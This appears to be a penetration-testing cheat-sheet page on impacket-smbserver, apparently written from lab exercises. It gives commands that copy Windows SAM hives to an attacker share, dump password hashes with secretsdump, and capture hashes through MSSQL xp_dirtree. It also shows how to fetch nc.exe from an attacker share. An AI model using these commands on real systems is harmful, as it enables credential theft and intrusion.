impacket-smbserver

# This is used to share the save registry hives from windows sam database
# First we make a folder for the files that we are getting
# Then we will name the fileshare like "CompData" and we will specify the folder that we created
mkdir CompData
sudo impacket-smbserver -smb2support CompData /home/ltnbob/Documents/


# Or use this
mkdir share
sudo python3 ~/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

# After that just prefer to Copying Reg Hives with reg.exe in windows commands

# This will show the sam database with NT and LM hash of the user
sudo ~/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

# You could also crack this with john or hashcat

# Once connected to MSSQL then will acccess the share 
EXEC master..xp_dirtree '\\10.10.110.17\share\'

# Attacker machine this will obtain you the user hash
sudo impacket-smbserver share ./ -smb2support

# This will transfer file from linux to windows
sudo impacket-smbserver share -smb2support /tmp/smbshare

Or 
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

# Just copy
# This is windows commands
copy \\192.168.220.133\share\nc.exe

Or 

net use n: \\192.168.220.133\share /user:test test
copy n:\nc.exe


# If it gets error like this
# Sometimes it works sometimes not
copy : You can't access this shared folder because your organization's security policies block unauthenticated guest access

# Just watch this
https://www.youtube.com/watch?v=vyatMj1Z2NQ&ab_channel=TechReview
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters

Previousimpacket-wmiexec Nextimpacket-samrdump

Last updated 1 year ago